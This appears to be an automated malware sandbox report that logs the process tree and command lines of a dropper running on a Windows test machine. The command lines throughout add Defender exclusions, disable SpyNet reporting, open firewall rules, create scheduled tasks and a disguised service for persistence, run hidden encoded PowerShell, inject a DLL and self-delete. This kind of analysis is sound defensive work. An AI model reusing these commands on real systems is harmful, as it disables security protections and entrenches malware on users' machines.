Installation.exeComplete.exelDdS1WMJPF4UAl19nBGTj0mP.exeJeysQhYz31CQLdtBWLpMqzAz.exeeBNdby7_U4k6msKv3eTB5mye.exe1fyR0Sd2aV3i3akI5rq0PZFv.exeaxzyo4HCwZKUGcUxPBCfRQjA.exexAyGsfpDFb33zy_PxKbzrrni.exeeui4rr46HDk2ShlpjL9iJ6bo.exe0BsqeDtyBSSUybevCqcCZH0Z.exel36_kCSX2CHi4f6qqS_AsMJ3.exeL84ksia5G66Ptl7obzFS__8v.exe7bNjlyoO2Feob3nuVN4b8BCU.exeH0n6Q_XzF3J2qEuqprygBUIR.exe2dMnD2VbczUZ6UZsrLHzJUre.exeenY7JHymAIDHHxOPFWIqVZOx.exe9o6imfdYedGqn3wjzwGuuvez.exeWerFault.exeInstall.exeAppLaunch.exeInstall.exeL84ksia5G66Ptl7obzFS__8v.exebuild.exedada.exeAccostarmi.exe.pif

pid	process
2472	Installation.exe
4144	Complete.exe
3924	lDdS1WMJPF4UAl19nBGTj0mP.exe
3956	JeysQhYz31CQLdtBWLpMqzAz.exe
2072	eBNdby7_U4k6msKv3eTB5mye.exe
4200	1fyR0Sd2aV3i3akI5rq0PZFv.exe
1824	axzyo4HCwZKUGcUxPBCfRQjA.exe
1204	xAyGsfpDFb33zy_PxKbzrrni.exe
3996	eui4rr46HDk2ShlpjL9iJ6bo.exe
4768	0BsqeDtyBSSUybevCqcCZH0Z.exe
3148	l36_kCSX2CHi4f6qqS_AsMJ3.exe
4088	L84ksia5G66Ptl7obzFS__8v.exe
1984	7bNjlyoO2Feob3nuVN4b8BCU.exe
4304	H0n6Q_XzF3J2qEuqprygBUIR.exe
4692	2dMnD2VbczUZ6UZsrLHzJUre.exe
4236	enY7JHymAIDHHxOPFWIqVZOx.exe
220	9o6imfdYedGqn3wjzwGuuvez.exe
3896	WerFault.exe
4636	Install.exe
868	AppLaunch.exe
3796	Install.exe
4392	L84ksia5G66Ptl7obzFS__8v.exe
4976	build.exe
3420	dada.exe
2284	Accostarmi.exe.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exeFiles.exeFolder.exemsedge.exeInstall.exerUNdlL32.eXecmd.exesvchost.exeInfo.execmd.exeWerFault.exe

description	pid	process	target process
PID 844 wrote to memory of 2772	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Files.exe
PID 844 wrote to memory of 2772	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Files.exe
PID 844 wrote to memory of 2772	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Files.exe
PID 844 wrote to memory of 3752	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	KRSetp.exe
PID 844 wrote to memory of 3752	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	KRSetp.exe
PID 2772 wrote to memory of 4272	2772	Files.exe	jfiag3g_gg.exe
PID 2772 wrote to memory of 4272	2772	Files.exe	jfiag3g_gg.exe
PID 2772 wrote to memory of 4272	2772	Files.exe	jfiag3g_gg.exe
PID 844 wrote to memory of 388	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	msedge.exe
PID 844 wrote to memory of 388	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	msedge.exe
PID 844 wrote to memory of 4020	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Install.exe
PID 844 wrote to memory of 4020	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Install.exe
PID 844 wrote to memory of 4020	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Install.exe
PID 2772 wrote to memory of 1708	2772	Files.exe	jfiag3g_gg.exe
PID 2772 wrote to memory of 1708	2772	Files.exe	jfiag3g_gg.exe
PID 2772 wrote to memory of 1708	2772	Files.exe	jfiag3g_gg.exe
PID 844 wrote to memory of 4372	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Folder.exe
PID 844 wrote to memory of 4372	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Folder.exe
PID 844 wrote to memory of 4372	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Folder.exe
PID 844 wrote to memory of 1744	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Info.exe
PID 844 wrote to memory of 1744	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Info.exe
PID 844 wrote to memory of 1744	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Info.exe
PID 844 wrote to memory of 2472	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Installation.exe
PID 844 wrote to memory of 2472	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Installation.exe
PID 844 wrote to memory of 2472	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Installation.exe
PID 4372 wrote to memory of 3196	4372	Folder.exe	Folder.exe
PID 4372 wrote to memory of 3196	4372	Folder.exe	Folder.exe
PID 4372 wrote to memory of 3196	4372	Folder.exe	Folder.exe
PID 844 wrote to memory of 3960	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	pub2.exe
PID 844 wrote to memory of 3960	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	pub2.exe
PID 844 wrote to memory of 3960	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	pub2.exe
PID 844 wrote to memory of 216	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	mysetold.exe
PID 844 wrote to memory of 216	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	mysetold.exe
PID 844 wrote to memory of 216	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	mysetold.exe
PID 844 wrote to memory of 3172	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	md9_1sjm.exe
PID 844 wrote to memory of 3172	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	md9_1sjm.exe
PID 844 wrote to memory of 3172	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	md9_1sjm.exe
PID 844 wrote to memory of 4144	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Complete.exe
PID 844 wrote to memory of 4144	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Complete.exe
PID 844 wrote to memory of 4144	844	75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe	Complete.exe
PID 388 wrote to memory of 5108	388	msedge.exe	msedge.exe
PID 388 wrote to memory of 5108	388	msedge.exe	msedge.exe
PID 4020 wrote to memory of 1828	4020	Install.exe	cmd.exe
PID 4020 wrote to memory of 1828	4020	Install.exe	cmd.exe
PID 4020 wrote to memory of 1828	4020	Install.exe	cmd.exe
PID 2284 wrote to memory of 3224	2284	rUNdlL32.eXe	rundll32.exe
PID 2284 wrote to memory of 3224	2284	rUNdlL32.eXe	rundll32.exe
PID 2284 wrote to memory of 3224	2284	rUNdlL32.eXe	rundll32.exe
PID 1828 wrote to memory of 5028	1828	cmd.exe	taskkill.exe
PID 1828 wrote to memory of 5028	1828	cmd.exe	taskkill.exe
PID 1828 wrote to memory of 5028	1828	cmd.exe	taskkill.exe
PID 1576 wrote to memory of 4372	1576	svchost.exe	Info.exe
PID 1576 wrote to memory of 4372	1576	svchost.exe	Info.exe
PID 1576 wrote to memory of 4372	1576	svchost.exe	Info.exe
PID 4372 wrote to memory of 3548	4372	Info.exe	cmd.exe
PID 4372 wrote to memory of 3548	4372	Info.exe	cmd.exe
PID 3548 wrote to memory of 3068	3548	cmd.exe	netsh.exe
PID 3548 wrote to memory of 3068	3548	cmd.exe	netsh.exe
PID 4372 wrote to memory of 3872	4372	Info.exe	csrss.exe
PID 4372 wrote to memory of 3872	4372	Info.exe	csrss.exe
PID 4372 wrote to memory of 3872	4372	Info.exe	csrss.exe
PID 1576 wrote to memory of 1936	1576	svchost.exe	schtasks.exe
PID 1576 wrote to memory of 1936	1576	svchost.exe	schtasks.exe
PID 4144 wrote to memory of 4812	4144	WerFault.exe	8jmbQb_rh3t2mrKFZwTwUGlq.exe

C:\Users\Admin\AppData\Local\Temp\75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe
"C:\Users\Admin\AppData\Local\Temp\75ecef10ec7dc850dc8f0a71b38f4223450e2a14b75d6dfb8a9e431eac1a2a94.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:844

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2772

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4272

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1708

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Suspicious use of WriteProcessMemory
PID:388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe7d4946f8,0x7ffe7d494708,0x7ffe7d494718
3⤵
PID:5108

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4372

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:3196

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3068

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:3872

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1936

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2440

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2472

C:\Users\Admin\Pictures\Adobe Films\RegwNqdmAe1tMYalmbSWfkjV.exe
"C:\Users\Admin\Pictures\Adobe Films\RegwNqdmAe1tMYalmbSWfkjV.exe"
3⤵
- Executes dropped EXE
PID:2000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 1880
3⤵
- Program crash
PID:4396

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3960

C:\Users\Admin\AppData\Local\Temp\mysetold.exe
"C:\Users\Admin\AppData\Local\Temp\mysetold.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:216

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4144

C:\Users\Admin\Documents\eui4rr46HDk2ShlpjL9iJ6bo.exe
"C:\Users\Admin\Documents\eui4rr46HDk2ShlpjL9iJ6bo.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3996

C:\Users\Admin\Documents\lDdS1WMJPF4UAl19nBGTj0mP.exe
"C:\Users\Admin\Documents\lDdS1WMJPF4UAl19nBGTj0mP.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3924

C:\Users\Admin\Documents\8jmbQb_rh3t2mrKFZwTwUGlq.exe
"C:\Users\Admin\Documents\8jmbQb_rh3t2mrKFZwTwUGlq.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Users\Admin\AppData\Local\Temp\b9cac397-d7eb-428c-b4ed-62df56e0e335.exe
"C:\Users\Admin\AppData\Local\Temp\b9cac397-d7eb-428c-b4ed-62df56e0e335.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4380

C:\Users\Admin\Documents\qhKDniWI2KmSmu8DUSRryMd9.exe
"C:\Users\Admin\Documents\qhKDniWI2KmSmu8DUSRryMd9.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1420

C:\Users\Admin\Documents\qhKDniWI2KmSmu8DUSRryMd9.exe
C:\Users\Admin\Documents\qhKDniWI2KmSmu8DUSRryMd9.exe
4⤵
- Executes dropped EXE
PID:4608

C:\Users\Admin\Documents\6rKQ4fBrbWatMcjKw2Rii9H2.exe
"C:\Users\Admin\Documents\6rKQ4fBrbWatMcjKw2Rii9H2.exe"
3⤵
- Executes dropped EXE
PID:4816

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3420

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4976

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
5⤵
- Creates scheduled task(s)
PID:2904

C:\Users\Admin\Documents\9o6imfdYedGqn3wjzwGuuvez.exe
"C:\Users\Admin\Documents\9o6imfdYedGqn3wjzwGuuvez.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 460
4⤵
- Program crash
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 468
4⤵
- Program crash
PID:768

C:\Users\Admin\Documents\2dMnD2VbczUZ6UZsrLHzJUre.exe
"C:\Users\Admin\Documents\2dMnD2VbczUZ6UZsrLHzJUre.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 460
4⤵
- Program crash
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 468
4⤵
- Program crash
PID:2740

C:\Users\Admin\Documents\L84ksia5G66Ptl7obzFS__8v.exe
"C:\Users\Admin\Documents\L84ksia5G66Ptl7obzFS__8v.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4088

C:\Users\Admin\Documents\L84ksia5G66Ptl7obzFS__8v.exe
"C:\Users\Admin\Documents\L84ksia5G66Ptl7obzFS__8v.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4392

C:\Users\Admin\Documents\0BsqeDtyBSSUybevCqcCZH0Z.exe
"C:\Users\Admin\Documents\0BsqeDtyBSSUybevCqcCZH0Z.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 0BsqeDtyBSSUybevCqcCZH0Z.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\0BsqeDtyBSSUybevCqcCZH0Z.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:3068

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 0BsqeDtyBSSUybevCqcCZH0Z.exe /f
5⤵
- Kills process with taskkill
PID:4436

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:4060

C:\Users\Admin\Documents\nHagp71zKaF7ccqraFqNDB4X.exe
"C:\Users\Admin\Documents\nHagp71zKaF7ccqraFqNDB4X.exe"
3⤵
- Executes dropped EXE
PID:1508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\nHagp71zKaF7ccqraFqNDB4X.exe
4⤵
PID:3160

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:3188

C:\Users\Admin\Documents\enY7JHymAIDHHxOPFWIqVZOx.exe
"C:\Users\Admin\Documents\enY7JHymAIDHHxOPFWIqVZOx.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4236

C:\Users\Admin\AppData\Local\Temp\7zS55F8.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4636

C:\Users\Admin\AppData\Local\Temp\7zS6A1C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3796

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2068

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:2076

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:4776

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:884

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:4284

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:928

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:4260

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "geERYycAY" /SC once /ST 08:44:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:1336

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "geERYycAY"
6⤵
PID:3160

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "geERYycAY"
6⤵
PID:2176

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 23:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\DmeRXPZ.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:928

C:\Users\Admin\Documents\H0n6Q_XzF3J2qEuqprygBUIR.exe
"C:\Users\Admin\Documents\H0n6Q_XzF3J2qEuqprygBUIR.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 624
4⤵
- Program crash
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 632
4⤵
- Program crash
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 660
4⤵
- Program crash
PID:2312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 804
4⤵
- Program crash
PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 808
4⤵
- Program crash
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 1248
4⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 1256
4⤵
- Program crash
PID:216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "H0n6Q_XzF3J2qEuqprygBUIR.exe" /f & erase "C:\Users\Admin\Documents\H0n6Q_XzF3J2qEuqprygBUIR.exe" & exit
4⤵
PID:2788

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "H0n6Q_XzF3J2qEuqprygBUIR.exe" /f
5⤵
- Kills process with taskkill
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 1316
4⤵
- Program crash
PID:4140

C:\Users\Admin\Documents\7bNjlyoO2Feob3nuVN4b8BCU.exe
"C:\Users\Admin\Documents\7bNjlyoO2Feob3nuVN4b8BCU.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 912
4⤵
- Program crash
PID:1744

C:\Users\Admin\Documents\l36_kCSX2CHi4f6qqS_AsMJ3.exe
"C:\Users\Admin\Documents\l36_kCSX2CHi4f6qqS_AsMJ3.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qxiebjdn\
4⤵
PID:4256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xjslbbfw.exe" C:\Windows\SysWOW64\qxiebjdn\
4⤵
PID:4232

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create qxiebjdn binPath= "C:\Windows\SysWOW64\qxiebjdn\xjslbbfw.exe /d\"C:\Users\Admin\Documents\l36_kCSX2CHi4f6qqS_AsMJ3.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:2176

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description qxiebjdn "wifi internet conection"
4⤵
PID:4976

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start qxiebjdn
4⤵
PID:2768

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1344
4⤵
- Program crash
- Suspicious use of WriteProcessMemory
PID:4144

C:\Users\Admin\Documents\eldGKg6AxnrodbfQsspOYUf2.exe
"C:\Users\Admin\Documents\eldGKg6AxnrodbfQsspOYUf2.exe"
3⤵
- Executes dropped EXE
PID:3596

C:\Users\Admin\Documents\xAyGsfpDFb33zy_PxKbzrrni.exe
"C:\Users\Admin\Documents\xAyGsfpDFb33zy_PxKbzrrni.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:1204

C:\Windows\SysWOW64\rundll32.exe
